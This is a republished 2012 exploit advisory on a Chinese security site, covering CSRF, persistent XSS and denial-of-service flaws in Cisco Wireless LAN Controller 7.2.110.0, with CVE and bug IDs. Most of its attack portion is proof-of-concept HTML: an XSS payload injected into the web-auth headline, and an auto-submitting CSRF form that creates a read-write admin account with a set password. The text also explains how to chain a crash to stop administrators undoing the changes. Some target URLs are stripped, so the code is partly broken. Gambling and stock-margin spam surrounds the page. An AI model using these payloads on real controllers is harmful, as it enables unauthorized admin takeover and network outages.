湖北11选5任选分布走势图一定牛
     
首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cisco Wireless Lan Controller 7.2.110.0 Multiple Vulnerabilities
来源: Security Analyst @ Independent Security Evaluator 作者:Holcomb 发布时间:2012-12-14  

Cisco WLC CSRF, DoS, and Persistent XSS Vulnerabilities
 
# Exploit Title: u [email protected]? - Cisco WLC CSRF, DoS, and Persistent XSS Vulnerabilities
# Date: Discovered and reported November 2012
# Author: Jacob Holcomb/Gimppy042 - Security Analyst @ Independent Security Evaluators
# Software: Cisco Wireless Lan Controller 7.2.110.0 (http://www.cisco.com)
# Note: Other versions are probably vulnerable, but I wasn't able to test.
# Cisco Bug ID and CVE: CSRF: CSCud50283/CVE-2012-5992, XSS: CSCud65187/CVE-2012-6007, DoS: CSCud50209/CVE-2012-5991
# Advisory/Video: " method="post" >
<input type="hidden" name="access_control" value="1"/>
<input type="hidden" name="webauth_type" value="internal"/>
<input type="hidden" name="redirect_url" value=""/>
<input type="hidden" name="aire_logo" value="show"/>
<input type="hidden" name="headline" value="HaXoReD<img+src=><script>alert(42)</script>>"/>
<input type="hidden" name="message" value="U+mAd?<img src=/upimg/allimg/121214/1405260.gif height=1000 width=1000 align=left>"/>
<input type="hidden" name="ext_webauth_url" value=""/>
<input type="hidden" name="buttonClicked" value="4"/>
<input type="hidden" name="indexedClicked" value="0"/>
<input type="hidden" name="err_flag" value="0"/>
<input type="hidden" name="err_msg" value=""/>
</form>

<script>
function CSRF() {window.open("
" method="post" >
<input type="hidden" name="access_control" value="1"/>
<input type="hidden" name="username" value="Gimppy"/>
<input type="hidden" name="userpwd" value="Pwnd123"/>
<input type="hidden" name="pwdconfirm" value="Pwnd123"/>
<input type="hidden" name="access_mode" value="readwrite"/>
<input type="hidden" name="buttonClicked" value="4"/>
</form>

<script>
document.ciscoCSRF.submit()
window.open("

</script>

</body>
</html>

 

--Bug--

DoS - Denial of Service

If a GET request is made to the URL listed below with the supplied HTML parameters, the Cisco WLC will crash and perform a cold start. The request requires authentication, so you would have to target a specific authenticated user using social engineering tactics, and get them to some how submit the request to the WLC. This DoS GET
request could be used in conjunction with my demonstrated chained POC exploit above using the persistent XSS vulnerability to crash the WLC after performing the initial attack. This would
prevent an admin from quickly undoing the changes that were made during the attack, and if the attacker was quick enough to get shell or web access on the WLC before the admin after
the WLC reboot, the attacker could change the admin password to prevent further access.

DoS URL:

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox HTML/JS DOS Vu
·PostgreSQL for Linux Payload E
·VLC Player 2.0.3 (NULL File) L
·Novell File Reporter Agent XML
·Uploadify jQuery Generic File
·Microsoft Internet Explorer 6-
·Microsoft windows remote deskt
·Crystal Reports CrystalPrintCo
·Smartphone Pentest Framework 0
·Firefox 17.0.1 Crash Proof Of
·CVE-2012-0217 Intel sysret exp
·Centrify Deployment Manager 2.
  推荐广告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved
湖北11选5任选分布走势图一定牛
安徽快3开奖一定牛 东软集团股吧 众想期货配资 点点策略 今天可以打麻将吗 成都麻将血战到底秘籍 证券公司给私募基金配资 根据投资所选标的的差异股票指数投资策略 私募基金配资是什么 股票配资平台是合法的么